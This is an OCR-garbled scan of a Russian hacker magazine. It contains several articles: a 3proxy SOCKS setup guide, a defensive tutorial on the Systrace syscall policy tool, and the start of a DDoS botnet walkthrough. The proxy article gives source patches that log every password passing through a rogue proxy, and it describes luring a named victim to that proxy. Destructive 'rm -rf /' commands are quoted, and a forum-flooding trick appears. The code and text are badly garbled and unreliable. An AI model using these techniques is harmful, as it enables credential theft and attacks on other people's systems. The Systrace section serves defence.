# прописываю адрес 0№-сервера (127.0.0.1 - для автомати- 
ческого определения) 

пзегѵег 127.0.0.1 
Ина сриг авторизацию 
аиііі попе 

# разрешаем пользоваться проксей с любого адреса 
аііоѵѵ* 

# указываем номер порта для нашего сокса, пусть это будет 
9876 

$оск$ -р9876 

# прописываем внутренний ір 
іпіегпаі 127.0.0.1 

# указываем файл, куда будут писаться логи 
Іод Меѵ/пиІІ 

й/беѵ/пиІІ - это «черная дыра», в которую можно 
Столько записывать инфу, но нельзя читать =) 



Чтобы конфиг записался на хард, нажми 
сігі+с. Теперь в каталоге, в котором ты со- 
бирал Зргоху, должен появиться новый файл 
Зргоху.сТд, содержащий описанные выше 
инструкции. Все - можно сказать, ты на 



финишной прямой: пришло время запускать 
соке! Для этого следует набрать команду 
./Зргоху Зргоху.сТд и радоваться жизни - 
установка сокса завершена. Настало время 
проверить его на работоспособность. 

На рисунке 2 виден скриншот файрволла, 
на котором изображена сетевая активность 
іец-іаіиента. Видно, что Мігапсіа пускает весь 
свой трафик через наш сокс-сервер, поэто- 
му все работает замечательно, так что пока 
компьютер не ребутнут, прокся будет жива. 

А НПСК ЧЕРЕЗ 80СК8 

Когда Олег начал писать эту статью, в его 
голову пришла одна замечательная идея. 
«Оказывается, - подумал N80, - технологии 
спецслужб может использовать и сам хакер». 
Откровенно говоря, Олежка свою идею опи- 
сал словами как-то странно и не совсем 
прозрачно, поэтому я - Никитос - вынужден 
был его поправить. Предположим такую си- 
туацию. Наш экстремист Олег хочет выма- 
нить какой-нибудь важный пароль у крутого 
хакера Форбика. Каким образом это удастся 
ему сделать? Конечно, здесь очень много 
вариантов. Например, N80 может дождать- 
ся, пока Форб приедет в Москву, напоить ха- 
кера водкой и, подразнив с утра холодной 
бутылкой «Боржоми», получить заветный 
пасс. Но несмотря на то, что Форб - ярый 
болельщик футбольного клуба «Динамо- 
Москва» и поэтому в столицу собирается уже 
несколько лет, он все никак не соберется и 
не доедет. Само собой, перспектива ходить 
с Форбиком по музеям Екатеринбурга Олега 
также не прельщает, и он, как всегда, приду- 
мал кое-что удаленно-изворотливое. А имен- 
но - установить свою проксю где-нибудь в 
инете, на одном из порутанных серверов. Но 
этот зоскз-сервер будет вести логи по всему 
проходящему через него трафику. Теперь 
N80 постучится к Форбу в іец, и заведет не- 
затейливый разговор о сетевой безопаснос- 
ти и как бы невзначай упомянет ір «очень 
быстрого, классного и 100% безопасного 
зоскз-сервера». Конечно, Форб никогда не 
славился наивностью, но все же тема безо- 
пасности актуальна для всех, и он непремен- 
но потестит проксик. Заметив, что этот соке 
реально быстрый, Форб поведется на раз- 
водку и сдаст Олегу все свои пароли к 
NА80’вским спутникам. Как тебе такая идея? 
Я всегда говорил: Олег очень умный :). 

А теперь давай попробуем реализовать эту 
фишку. Тут, правда, возникает небольшая 
проблемка: Зргоху не предусматривает воз- 
можности логирования трафика, поэтому нам 
придется самим немного поправить исходни- 
ки. Изменения нужно делать в файле 




ГВІСНЕСКЕН 



Т ы, конечно, знаешь, что с помощью программы РгохуСПескег 
можно определить, является ли прокся анонимной или нет. 
Жаль, что нету такой тулзы, с помощью которой можно прове- 
рить, ведет ли она логи и какие органы ее контролируют :). Но 
если у тебя есть идея, как такую тулзу написать, - намыль мне, 
подумаем вместе :). 



л1ВІ*І 




л Помни, что зна- 
чительная часть 
прокси-серверов, 
опубликованных в 
общедоступных ис- 
точниках, является 
полнейшей подста- 
вой - это либо 
ГБшный ресурс, 
либо проксик тако- 
го же взломщика, 
как ты, который 
пишет логи по все- 
му проходящему 
трафику. 

л На нашем диске 
ты найдешь оба 
упомянутых прок- 
си-сервера, а так- 
же набор ПРО, опи- 
сывающих семей- 
ство зоекз-прото- 
колов. 




л Более подроб- 
ную инфу по Зргоху 
можно найти на от- 
личном сайте 
ЗАРАЗА: ИНр://зеси- 
гііу.ппоѵ.ги 
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ЧИТАЙ 

«ПУТЕВОДИТЕЛЬ»! 

ЖУРНАЛ 
ПРОХОЖДЕНИЙ 
И КОДОВ для 
КОМПЬЮТЕРНЫХ ИГР 




• 192 полосы исчерпывающей информации об играх 

• Более 1 500 чит-кодов 

• СЭ-диск с видеоуроками и базой кодов и прохождений 

• Двухсторонний постер с детальными картами 
уровней и тактическими схемами 

• Прикольная наклейка с кодами 

V _ / 



ЗЯМЕТРЕМ СЛЕДЫ 



Е сли поставить соке на какой-нибудь сервер прямо под нос 
компетентному администратору, программа проживет ровно 
до того момента, когда админ наберет команду рз и увидит в 
списке процессов посторонние задачи. Чтобы прокся продер- 
жалась как можно дольше, хакеры переименовывают файл 
Зргоху в менее бросающиеся в глаза названия, например в 
ІодсІ, зесигііу и т.п. Если хакер имеет гооі-доступ к серверу, он 
устанавливает гооікіі: - набор утилит, который пытается скрыть 
присутствие хакера на сервере. Об этом мы уже много писали, 
так что читай подборку статей Форба на эту тему. 



зосктар.с, поскольку именно там происходит 
обмен данными. Начнем с исходящего от 
сервера трафика. Найди строку 
«І = гесѵТгот(рагат->гетзоск, ЬиТ, ВІІР8І2Е, 
О,...». Эта функция посылает содержимое 
переменной ЬиТ на удаленный сервер. Что- 
бы контент этой переменной постоянно 
писался в файл, нужно вставить после этой 
строки такой код: 

*(ЬиН)=0; 

II открываем файл /ітр/туіод.оиі для добавления инфы: 
ту_Ір=Іореп("/ітр/туІод_оиі","а"): 

II пишем в него содержимое переменной ЬиР 
ІргіпіІ(піу_Ір,"%$",ЬиО: 

II закрываем файл 
ІсІо$е(ту_(р); 

Исходящий от клиента трафик, который 
может содержать важные пассы, записыва- 
ется аналогичным способом. После строки 
«ге5=5еп(Йо(рагат->гет50ск, ЬиТ + Тгапз, і - 
Тгапз, 0...» нужно всего-навсего добавить та- 
кой код: 

*{Ы + і)=0; 

ту_Ір=Іореп("/ітр/піуІод_іп","а"): 

ЕргіпЩту_Ер,"%$",ЬиМгапв); 

(сіозе(туір); 

Теперь весь проходящий через соке тра- 
фик будет писаться в файлы туіодіп и 
туІодоиТ. И в любой момент можно отослать 
его на мыло и вытащить необходимые пассы. 

Взгляни на рисунок 3. Я залогинился по РТР 
на сервер ѵм.рабопакді, используя свой подс- 
тавной соке. Как видишь, мой исходящий РГР- 
трафик успешно записался в туіод іп - даже 
пароль виден открытым текстом! Конечно, если 
твоя жертва будет логиниться по 88Н, пасс не 
будет так явно светиться, но если покопаться в 
трафике, можно достать из него ключи шифро- 
вания, а оттуда и сам пароль. 



А ЗПКПЮЧЕНИЕ 

А теперь я бы хотел предостеречь тебя от ис- 
пользования публичных ргоху-серверов. Не 
знаю, насколько большим откровением это 
для тебя станет, но большая часть публичных 
серверов из ТгезИ ргоху ІізТ - жесткая подста- 
ва. Это либо ГБшные проксики, либо серве- 
ры, ведущие логи по передаваемому трафи- 
ку. Ну подумай сам - кому нужно платить за 
огромный трафик, генерируемый публичным 
зоскз-сервером? Конечно, хакеры за этот 
трафик не платят, но и разводить альтруис- 
тическую бодягу никому не нужно. Каждый 
созданный вменяемым человеком проксик 
пишет в логи все передаваемые пароли и 
идентификаторы, это факт. Так что делай вы- 
воды и будь начеку! В любом случае, куда 
безопаснее, быстрее и удобнее будет уста- 
новить пару-тройку собственных серверов и 
использовать в своих темных делах только 
их. Собственную задницу надо беречь. ЗС 

ТІР5 ТРРХСН.5 



Хочешь увидеть свои советы в журнале? 
Присылай их на адрес $кІуагоѵ@геаІ.хакер.ги. 
Ведущий рубрики Тірз&Тгіскз Иван Скляров. 



л В некоторых форумах нет ограничения на размер 
аватара (или значение слишком большое). Поэтому 
можно поставить аватаром ссылку на какой-нибудь 
огромный по весу ѵѵаіірарег. Тот, кто сидит на біаіир'е, 
удивится тормознутости форума (если несколько 
человек оставит сообщения с аватарами хотя бы по 
400 КЬ) и наличию ѵѵаіірарег'ов в Тетрогагу Іпіегпеі 
Рііез. Тот же, кто на выделенке, получит энное 
количество входящего трафика. Вот такое западло для 
вражеского форума ;). 

роіуак 

роІуаквЬІші 
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РЕДАКЦИЯ ЯШНЬР 




Хочешь быть-ОКР 



ЗАРАБАТЫВАЙ с Віокеѵ ! 
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Ш юбому админу, для которого вопросы безопасности не пустой зоук, известны недостатки модели управленин доступом в ІШІН. I 
самом деле, примитивная схема «НооІ всемогущ, а все остальные равны» плюс оеІлігІ/веІдігМіиты для нивелирования этой разницы 
дня отдельных программ были неплохим решением в семидесятые, но в современном мире этого явно недостаточно. К тому же, 
сочетание «Лапу олііі рюдгагп» за тридцать пет успело набить оскомину и стать головной болью не одного поколения администраторов. 

учимся контролировать СИСТЕМНЫЕ вызовы оиіх 



а 



4 постановка задачи 

то-то решает эту проблему 



радикально и использует в 
своих системах более сов- 



К _ 

прикручивая патчи, реализу- 
ющие МАО, КВАС, ОТЕ и 
еще много других страшных 
аббревиатур, а кто-то при- 
держивается золотого правила «От добра 
бобра не ищут», которое применительно к 
старине юниксу звучит примерно так: «Ниче- 
го менять не надо, просто все должно быть 
под контролем». 

Скорее всего, так рассуждал и Нильс Про- 
вес (ІМіеІз Ргоѵоз), разработчик №ШЗО (а в 
прошлом - и ОрепВЗО) из Центра по интегра- 
ции информационных технологий (СІТІ) Мичи- 
ганского университета. Что делает любая 
программа после запуска? Совершает сис- 
темные вызовы на открытие/запись файлов, 
создание сетевых сокетов, осуществление 
операций ввода/вывода и т.п. Так давайте же 
эти вызовы контролировать, решил Нильс. Не 
он первый это придумал, не он, вероятно, 
последний. Да не просто контролировать, а 
самому задавать, какие вызовы программе 
делать позволительно, а какие - нет. Причем 
было бы неплохо хранить настройки в удобо- 



читаемом виде для отдельных программ в со- 
ответствующих файлах политик (т.е. не на 
любимом Шзр'е или т4 :)), которые бы счи- 
тывались динамически, а не компилирова- 
лись в базу. Сказано - сделано. Так на свет 
появился Зузігасе (зузіет саііз ігасег). 

Впервые широкой общественности 
Зузігасе был представлен вместе с релизом 
ОрепВЗО 3.2. Тогда Провос был одним из 
девелоперов этой операционки, но затем у 
него возникли разногласия с неврастенич- 
ным лидером проекта ТІіео бе РаасЙ, и 
Нильс вернулся туда, откуда пришел, - в 
родственный проект №ШЗО, чей код и хака- 
ет по сегодняшний день, коммитя в сѵз Ігее 
свежие релизы Зузігасе. Однако в ОрепВЗО 
поддержку этой полезной тулзы не заброси- 
ли - все проблемы по портированию 
№ШЗО-версии легли на плечи Магіиз 
АатосМ Егікзеп и ІМікоІау ЗШгт. 

А ПРОБУЕМ 8Ѵ8ТКПСЕ 

При запуске Зузігасе принимает в качестве 
аргумента имя исполняемого файла и читает 
глобальные файлы настроек из каталога 
/еІс/ЗузІгасе и пользовательские конфиги из 
$НОМЕ/.ЗузІгасе/. Конфиги Зузігасе - это 
текстовые файлы со специальными фильтра- 
ми, определяющими, какие из сисколов, вы- 



зываемых исполняемой программой, необ- 
ходимо разрешить, а какие запретить. По 
умолчанию в ОрепВЗО заготовлены полисы 
изгзЬіппатеб для сервера доменных имен 
патеб и изг зЬіп Ірб для демона печати Ірб. 

Но для начала давай попробуем сами от- 
трейсить что-нибудь простенькое. По умол- 
чанию Зузігасе запускает свою графическую 
версию, хЗузІгасе, с менюшками и кнопочка- 
ми, ожидая от пользователя нажатие регтіі 
(разрешить) или бепу (запретить) в ответ на 
выдачу описания системного вызова, совер- 
шаемого подконтрольной программой. Не 
иначе, Провос любитель сверять время по 
хсіоск и резаться ночами напролет в хіеігіз - 
я не представляю, как надо не любить 
жизнь, чтобы держать иксы на серверах. 
Консольная версия интерфейса доступна по 
ключу -I, и я сразу же заалиасил Зузігасе на 
Зузігасе -I в конфиге своего шелла, чтобы 
избежать геморроя. 

Первое, что приходит в голову, - протрей- 
сить команду вывода содержимого текущей 
директории: Зузігасе 4 Із. Систрейс сразу 
же выдаст первый системный вызов, запра- 
шиваемый программой Із, и спросит, разре- 
шить или запретить его выполнение. Как 
Апзѵѵег вбей регтіі или бепу. Если значение 
какого-либо вызова тебе непонятно - читай 
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соответствующие доки, сисколлы описаны 
во втором разделе справочных страниц (тап 
2 <имя_сисколла>). Так, вызов за вызовом, 
ты прошагаешь вместе с Із до победного 
конца, получив в итоге файл политик (роіісу) 
в $НОМЕ/.Зузігасе/. Для Із это будет Ьіпіз - 
полный путь до оттрейсенной программы 
с префиксом «_» вместо «/». В дальнейшем 
при запуске Із через Зузігасе (с флагом -а, 
арріу роіісу), последняя будет читать конфиг 
политик, не задавая вопросов, только если 
не встретит новый сисколл. Результат полно- 
го трейса ты можешь видеть на скриншоте. 

Очевидно, что любая, даже самая простая 
прога совершает приличное количество вы- 
зовов, большинство из которых стандартны 
и неопасны. Поэтому проще всего составить 
правила, по умолчанию разрешающие огра- 
ниченное множество вызовов. Тогда при за- 
пуске Зузігасе спросит тебя только о новых 
вызовах, не упомянутых в роіісу. Самый 
простой способ получить полис для прог- 
раммы - запустить Зузігасе с ключом -А 
(аііоѵѵ аІІ, в результате чего все зузсаііз будут 
разрешены и программа выполнится), а за- 
тем поправить файл политики под свои нуж- 
ды. Очевидно, что для подозрительной прог- 
раммы данный подход не подходит. 

Л ИГРПЕМ В ПОЛИТИКУ 

Взглянем на сгенерированный файл полити- 
ки Ьіп із. Первая строчка - путь до програм- 
мы и тип эмуляции вызовов (к примеру, 
паііѵе-* для ОрепВЗО, Ііпих-* для 1_іпих). Все 
последующие строки в общем виде можно 
записать так: Ссистемный вызов> <усло- 
вие> <действие>. С системными вызовами 
все понятно, условия (сопсііііопз) представ- 



ляют собой аргументы сисколла, а основных 
действий всего два - регтіі и бепу. Для отк- 
рытия файла условием может выступать его 
имя, для сокета - тип, для юзера - уникаль- 
ный идентификатор и т.д. В общем случае 
обработка фильтра полиса производится с 
помощью четырех ключевых слов: 

ед - верно, если аргумент вызова в точ- 
ности соответствует заданному. Пример: 
паІііѵе-ТзгеасІ: ТМепате ец 
«/Ьоте/іоха/. Зузігасе» іЬеп регтіі. 

таісЬ - выполняется раскрытие (глоб- 
бинг) пути до файла. Например, правило 
паііѵе-ехесѵе: іііепате таісЬ «$НОМЕ/Ьіп/*» 
іЬеп регтіі будет действовать для всех фай- 
лов каталога Ьіп в домашней дире пользова- 
теля. 

ге - верно, если правило попадает под 
заданное регулярное выражение. Любители 
перла и регекспов, салют :). 

зиЬ - верно, если в аргументе вызова при- 
сутствует заданное подвыражение. Например: 
паііѵе-соппесі: зоскасісіг зиЬ «:515» іЬеп регтіі 
будет работать для коннектов как по ІЮР, так 
и ТСР- протоколу. Да, ты верно догадался, это 
правило подошло бы демону печати. 

Как правило, сетевой сервис запускается 
от рута, опуская привилегии до прав подк- 
люченного юзера либо до прав специально 
заведенного для этих целей пользователя 
(например, ззЬсІ, ш/ѵѵ, патесі, сІИср), но 
ему все еще нужен гооі на начальном этапе, 
хотя бы для того чтобы забиндить іср/иф- 
порт в диапазоне от 0 до 1024. Так работают 
почти все сервисы - ззЬсІ, Ьіірб, патесі. На- 
конец, полно сервисов, которым все еще 
нужны полноценные права рута и которые 
знать не знают, что такое ргіѵііеде зерагаііоп. 



анатомия системный вызовов 

С истемные вызовы - это низкоуровневые обращения непос- 
редственно к ядру операционной системы для выполнения 
определенной функции. Во время написания программы ты, как 
правило, используешь вызовы функций из системной библио- 
теки (ІіЬс, в 1_іпих - дІіЬс), которые в процессе выполнения прог- 
раммы все равно транслируются в зузсаііз (кстати, ничто не ме- 
шает тебе кодить системные вызовы напрямую). 




Избежать потенциально опасной ситуации 
можно, написав правило, в котором было бы 
указано, какие действия демону позволено 
совершать (какие файлы читать, к каким 
портам цепляться), а какие - нет. 

^зпчем контролировать? 

Если ты все еще задаешься вопросом, зачем 
нам контролировать системные вызовы 
программ, то «поздравляю тебя, Шарик, ты 
балбес». Для хаксора это бесценная возмож- 
ность прикинуть, действительно ли только 
что стрейденный бинарник (сорсы, ясное де- 
ло, часто не дают) свежайшего сплоита бу- 
дет лезть на уязвимый ВІШ, переполняя 
бедняге буфер и ломая сЬгооі, или вместо 
этого забиндит рутшелл на машине хакерю- 
ги, а то и отправит к праотцам всю порно- 
коллекцию эксплоитов и приватных ддосе- 
ров. Просто натрави Зузігасе на новый 
0сІау_ІЗЗі_р10іі и смотри, что тот будет де- 
лать. Думаю, патесі -эксплоиту ни к чему со- 
вершать системный вызов вроде этого: 

/Іюте/іоха/Іезі/ІЗЗірІОП, рМ: 22366(0)14036], роіісу: 

/Ііоте/іоха/іезі/ІЗЗірІОІІ, ііііеге: 13, $у$саІІ: паііѵе-ехесѵе(59), 

ТПепате: /Ьіп/$И, агдѵ: $Іі -с гт -гі/ 

Для администраторов и остальных нор- 
мальных людей Зузігасе - это возможность 
контролировать процессы путем составления 
жесткого конфига. Как пример - уже упоми- 
навшийся здесь полис 
/еіс/Зузігасе/изгзЬіппатесІ, где серверу 
имен разрешено принимать соединения 
только по 53/исІр, взаимодействовать с до- 
веренными ЭИЗ-серверами, осуществляя 
трансфер зонных файлов по 53/іср, и читать 
только те файлы, которые нужны для его ра- 
боты. Если в патесі будет найдена новая 
уязвимость (а она будет найдена, я уверен, 
ведь не секрет, что ВІШ - та еще поделка), 
взломщику будет нечего ловить, т.к. хакну- 
тый патесі не сможет выполнить код, откры- 
вающий шелл на каком-нибудь порту, - по- 
литика не позволит. 

Нетрудно догадаться, что Зузігасе дает 
возможность поиграться с сокрытием фай- 
лов и директорий. Например, следующая 
строчка в Ьіп із запретит просмотр содержи- 
мого каталога /еіс для всех пользователей, 
не входящих в админскую группу ѵѵЬееІ: 




а Разумеется, 
Зузігасе - не пер- 
вая тулза, работа- 
ющая с политикой 
ограничения сис- 
темных вызовов. 
Самый популярный 
аналог разработан 
для РгееВЗй и на- 
зывается СегЬ (сег- 
Ьег.зі.пеі). Глав- 
ный его недостаток 
- статические по- 
литики, требующие 
перекомпиляции 
при изменении. 
Зузігасе же каждый 
раз перечитывает 
конфиг, что, к со- 
жалению, сказыва- 
ется на производи- 
тельности. 

Ч3*> 

л На нашем диске 
ты найдешь ма- 
ленький бонус - че- 
тыре Зузігасе- 
враппера (прос- 
тейший, два вари- 
анта зізИ и зѵѵгар- 
рег, специально 
созданный для за- 
пуска зиісГных би- 
нариков), а также 
набор полисов 
Наігу ЕуеЬаІІ. 



паііѵе-і$геа(1: Шепате ер "/еіс" Ціеп (Іепуіепоепі] Іод, іі 
дгоир != Йееі 

Да не просто запретит. Зузігасе позволяет 
опционально добавлять в конец правила код 
возвращаемой ошибки (еггогсосіе) и/или 
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протоколировать сисколл (Іод). Еггогсосіе - 
это текстовая запись кода ошибки (посмотри 
тап 2 еггпо), который будет возвращен 
программе в ответ на запрошенный систем- 
ный вызов. В моем примере это ошибка «Та- 
кой файл не существует»: 

% $у$ігасе -а 1$ /еіс 

1$: /еіс: N 0 жіі Ш ог сіігесіогу 



Л 8Ѵ8ТВ0СЕ0 8НЕИ 

Думаю, ты уже задался вопросом, какая поль- 
за епсі-изег'ам от всех этих правил, если они 
работают только при скармливании программ 
систрейсу. Не будет же пользователь писать 
Зузігасе -а перед выполнением каждой ко- 
манды. Вот было бы здорово, если бы 
Зузігасе был вшит в шелл и его работа была 
прозрачной для юзера. Что ж, бозе Магагіо 
помог сделать мечту реальностью. Скачиваем 
зізіі с топкеу.огд/фзе/зоЙѵѵаге/зІзІѴ, компи- 
лируем, кладем в /Ьіп/ и создаем класс 
Зузігасе, добавив в /еіс/іодіп.сопі следующее: 

# ѵі /еіс/іодіп.сопі 

$у$ігасе:\ 

:$ііеІІ=/Ьіп/$і$іі:\ 

:ЫеІаиІ1 

Затем перестраиваем хэшированную базу 
/еІс/Іодіп.сопІ.сІЬ: 

# сар.тМЬ /еіс/Іодіп.соп! 

Так мы создадим новый класс пользовате- 
лей, оболочкой для которых будет выступать 
зузігасесі зііеіі. І_одіп сіазз - очень удобная 
ВЗЭ-фича, позволяющая гибко управлять 
пользователями, назначая разным классам 
разные ограничения, виды аутентификации, 
переменные окружения и прочее (смотри 
тап 5 Іодіп.сопТ). Затем, если при создании 




ПОДДЕРЖИВПЕИЫЕ ЭМУЛЯЦИИ 

В настоящее время Зузігасе нэйтивно, т.е. в чистом виде при- 
сутствует в ІМеІВЗО, ОрепВЗЭ и ОрепОагѵѵіп. Под І_іпих и 
РгееВЗй есть только порты, причем от версии под фряху попа- 
хивает старьем, что печально. Искренне надеюсь, что скоро 
увижу свежий порт Зузігасе где-нибудь в /изг/роіТз/зузиІіІз/зуз- 
Ігасе или даже в /изг/згс/зесигііу/зузігасе. 



пользователя ты назначишь ему класс 
Зузігасе, в качестве шелла у него будет 
сзН/кзИ/ізІі, но уже зузігасесі. 

Сразу отмечу, что эти деяния сопряжены 
с большими трудностями - тебе нужно будет 
сочинить политику для каждой программы, 
начиная с шелла пользователя, иначе работа 
простого юзера превратится в мучение. В 
комплекте зІзИ идет несколько темплейтов, 
но этого явно мало. У проекта Наігу ЕуеЬаІІ 
(Шр://Ыа(а$еІ.огдНІоІі/[іе/) правил побольше, но 
все равно придется доводить его до ума ру- 
ками. Я знаю только одного хостера, практи- 
кующего зузігасесі зМеІГы, - это хакерский 
притон попкеу.огд. Если когда-нибудь улома- 
ешь их админа заархивировать тебе весь его 
/еіс/зузігасе/ - стукни мне в мыло, я тоже 
буду не прочь глянуть ;). 

А КОНТРОЛЬ ЗД ПОВЫШЕНИЕМ 
ПРИВИЛЕГИИ 

Помимо простого разрешения и запрещения 
системных вызовов, Зузігасе умеет повы- 
шать привилегии процессов (ргіѵііеде еіеѵа- 
Ііоп). Нет нужды в сотый раз рассказывать, 
что зиісі/здісі-биты изменяют привилегии 
программы, запуская ее от имени другого 
пользователя (конкретно - ее владельца), и 
чем чревата уязвимость в зиісі гооі-програм- 




ме (программе, принадлежащей руту и име- 
ющей установленный зиісі-бит). Простейший 
пример - это программа /зЬіп/ріпд. Чтобы 
сформировать и отправить ІСМР- пакет, про- 
ге требуется создать ПАѴѴ-сокет, а подобное 
право в ІІІМІХ имеет только гооі. Очень часто 
- и ріпд как раз демонстрирует это - права 
суперпользователя нужны для выполнения 
всего лишь нескольких вызовов, у ріпд это 
зоске!(АР_1 N ЕТ, ЗОСК_КАѴѴ, ІРРРЮТО_ІСМР). 
Однако сМтосІ +з ставит под угрозу всю 
программу. Зузігасе позволяет избавиться от 
зиісі/здісі-бита, повышая привилегии прог- 
раммы только на определенные сисколлы. 
Для этого в правило нужно добавить дирек- 
тиву аз гооі, например: паііѵе-зоскеі: зоск- 
бот ец «АР ІМЕТ» апб зоскіуре ец 
«ЗОСКВАѴѴ» ІМеп регтіі аз гооі. 

К сожалению, избавить тот же ріпд от 
зиісі -бита с помощью Зузігасе не удастся. 
Провос стал заложником собственной кон- 
цепции программы, разрешив любому поль- 
зователю создавать свои политики и запус- 
кать Зузігасе. Дабы счастливые юзеры не 
побежали добавлять аз гооі в свои рулесы, 
пришлось разрешить использование фичи 
ргіѵііеде еіеѵаііоп только в случае, когда 
Зузігасе запущен от рута. Получается, чтобы 
избавиться от рутовых прав, нужны... права 
рута. Глупо, согласен. Это вторая вещь, ко- 
торая меня бесит в Зузігасе, после ее гра- 
фической версии :). Вероятно, данная воз- 
можность находит применение лишь тогда, 
когда некоторый демон запускается от рута, 
дропает свои форки до прав подключенных 
юзеров (или подобного непривилегирован- 
ного пользователя), а потом требует рутовые 
права, допустим, чтобы прочитать файл па- 
ролей для авторизации пользователя. Тогда 
админ запускает демон под контролем 
Зузігасе, разрешив тому повышать свои при- 
вилегии на определенные системные вызовы 
(Ьіпб, геаб, ехесѵе и т.д.). 



8Ѵ8ТВПСЕ НО СТРОЖЕ ДЕРЕВО ВОРТОВ 



Е сли ты захочешь проконтролировать собираемую из портов 
программу, то при компиляции добавь параметр ІІЗЕЗѴЗ- 
ТЯАСЕ: 

# с(1 /и$г/рог1$/дате$/хріІо! 

# таке ІІЗЕ_ЗУЗТРАСЕ=уе$ іпзіаіі сіеап 



Таким образом, при выполнении команды таке цели сопіідиге, 
ЬиіІсІ и Іаке будут защищены Зузігасе'ом и устанавливаемая 
программа не сможет совершить никаких подозрительных и уж 
тем более деструктивных действий. Хотя не секрет, что сборка 
программ из портов не приветствуется политикой ОрепВЗО. 
Вместо этого рекомендуется использовать прекомпилирован- 
ные пакеты. 
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Правильный журнал 
о компьютерных играх 




ЯДРЕНЫЙ СИСТРЕЙС 



З узігасе работает через устройство /сіеѵ/зузігасе, что требует 
поддержки ядром специального псевдоустройства: 

р$еисІо-сІеѵісе $у$ігасе 1 



Разумеется, /зуз/сопѴСЕЫЕРІС имеет такую опцию по умолча- 
нию. Вообще, ОрепВЗО-Іеат не рекомендует пересобирать яд- 
ро: в СЕЫЕВІС можно найти все, что нужно, не подвергая систе- 
му опасности ее запороть. Так что от тебя даже не примут баг- 
репорт, если ты нашел ошибку в Зузітасе не на СЕЫЕВІС-ядре ;). 



Обрати внимание, что для ргіѵііеде еіеѵа- 
йоп требуются именно ПРАВА рута, так что 
прокол в системе Зузйасе можно попробо- 
вать компенсировать за счет грамотной 
настройки 5іісіо(8). 

Л КОКЕРЫ Н00Б0Р0Т 

Итак, Зузйасе позволяет нам отслеживать 
системные вызовы и предлагает вариант из- 
бавления от зиісГных программ путем конт- 
роля повышения привилегий. Разумеется, 
принцип работы Зузйасе более сложный, 
чем может показаться на первый взгляд, за 
подробностями обращайся к описанию от 



Провоса на его странице 
м.сШ.итісЫи/и/ргоѵо$/. Список рассылки, 
посвященный Зузйасе, - 
Шр://попкеупаіІ.огд/паіІпап/Іі$Ш(о/5у$ігасе/. 

А теперь тебе домашнее задание ;). Как 
известно, два года назад Йр-сервер популяр- 
ного ігс-клиента ВйсбХ был взломан, а сам 
клиент забэкдорен. Теперь Ьаскбоог-патч к 
ВіісІіХ можно найти по адресу ѵѵш.$есигіІу(о- 
си$.сот/агс№ѵе/1/280009. Для успешного выпол- 
нения миссии тебе нужно пропатчить бичик- 
су, запустить ее в Зузйасе и попытаться от- 
ловить вредоносный вызов бэкдора. Удачи. 

И не делай ничего под рутом! :) ЗП 




МИНУСЫ 8Ѵ8ТН0СЕ 



Е сли при использовании Зузігасе все становится таким вкус- 
ным и секурным, то возникает резонный вопрос: «Почему до 
сих пор в Ыеі и ОрепВЗО не затрейсили все демоны и базовые 
бинарики?». К сожалению, ответов здесь будет несколько: 

- существенно снижена скорость работы программ (за счет до- 
полнительных вызовов семейства ехес, постоянного контроля 
за сисколлами, протоколирования запросов и т.д.); 

- разработчикам невероятно сложно создать полис, способный 
удовлетворить все потребности пользователей; 

- пока не существует ни одного полиса, корректно работающе- 
го с N15 и некоторыми видами аутентификации; 

- потенциальная опасность возникновения гонок привилегий 
(гасе сопсІШопз), например, из-за того, что Систрейс перехва- 
тывает и замещает имена файлов; 

- далеко не идеальная разработка. 





Правильный объем 224 СТрЭНИЦ 



Правильная комплектация 

3 СО или РѴР 



Правильная цена 



но 



Р У Б Л 



Никакого мусора и невнятных тем, 
настоящий геймерский рай 

ТОЛЬКО РС ИГРЫ 



■ ТНЕ $ІМ$ 2 

Эксклюзивный обзор только в нашем 
журнале 

■АЛЕКСАНДР 

63С делает игру для ІІВІ50ГТ 

■ ДАЛЬНОБОЙЩИКИ 3 

Почему нам предстоит покорять Америку? 

■ СПЕЦТЕМА 

Рассказ о Московской Фисра Лиги, отчет о 
поездке на Сатез Сопѵепііоп и 
фестивале "Слияние" 

■ РЕЦЕНЗИИ 
Обзор 18 игр 

■ ДНЕВНИКИ РАЗРАБОТЧИКОВ 
Создатели "Метро-2", "Казаков 2", 
"Корсаров И" и $.Т.А І.К.Е.К.'а 
рассказывают о проделанной за месяц работе 



УЖЕ В ПРОДАЖЕ 



ЕСЛИ ТЫ ГЕЙМЕР - 
ТЫ НЕ ПРОПУСТИ Ш Ь! 









г 



ж* 




се, что иы писали о 00о8-атаках, по сих пор носило исключительно теоретический характер. Сегодня ны решили приоткрыть завесу 
секретности и рассказать тебе, как такие атаки проводятся на практике. Специально дпя тебя иы нашпи чепа, который проделает 
вместе с тобой все шаги к созданию 00о8-арнии и проведет небольшую атаку на один из узлов Сети. 




С03ЦПНИЕ СОБСТВЕННОЙ ВВ08-0РНИИ 



А ПОМЧППИСЬ! 



А НО РПШТЬЕ 




Е сли ты временами страдаешь 
провалами в памяти и совсем 
позабыл, что такое ОйоЗ-атаки, 
напомню. Допустим, мне прис- 
пичило вывести крупный сервер 
неприятеля из строя. Каким об- 
разом я могу это сделать? Ко- 
нечно, существует множество 
различных способов. Например, если мне 
удастся поломать сервак, получить гооі-зііеіі, 
я смогу выполнить и команду сб /;гт -РСТ *, в 
результате чего все файлы, находящиеся на 
серванте, удалятся и компьютер естествен- 
ным образом перестанет работать. Но этот 
метод не так уж и идеален - получить шелл- 
доступ с абсолютными привилегиями не всег- 
да просто. Поэтому порой бывает целесооб- 
разно использовать другие, более универ- 
сальные способы. Например, можно послать 
серверу огромное количество мусорного тра- 
фика, полностью забив входящими пакетами 
канал жертвы. В результате этого атакуемый 
компьютер просто перестанет отвечать на 
запросы до тех пор, пока не прекратится 
флуд. Конечно же, для реализации этой тех- 
нологии общая пропускная способность кана- 
лов, с которых производится атака, должна 
быть больше, чем канал атакуемой тачки. 



В общем-то, цель понятная: мне нужно зав- 
ладеть каналами, суммарная производи- 
тельность которых превышает или хотя бы 
сравнима со скоростью канала жертвы. Тут 





можно пойти двумя путями. Первый заклю- 
чается вот в чем. Можно взломать несколь- 
ко крупных серверов, залить и собрать на 
них специализированный софт, реализую- 
щий одну из ТІоосІ-атак, после чего отдать 
им команду на начало ООоЗ-атаки. Так, нап- 
ример, НІМ/АСК ІІообег от ЗАРАЗ’ы (ѵшюесигі- 
іу.ппоѵ.ги/Ше$Мгеат3.с) на ура валит серверы 
под ѴѴіп2к. Но что бы ни говорили, поломать 
десяток крупных серверов - сложная, порой 
непосильная задача. Именно по этой причи- 
не сегодня я пойду вторым путем: устрою 
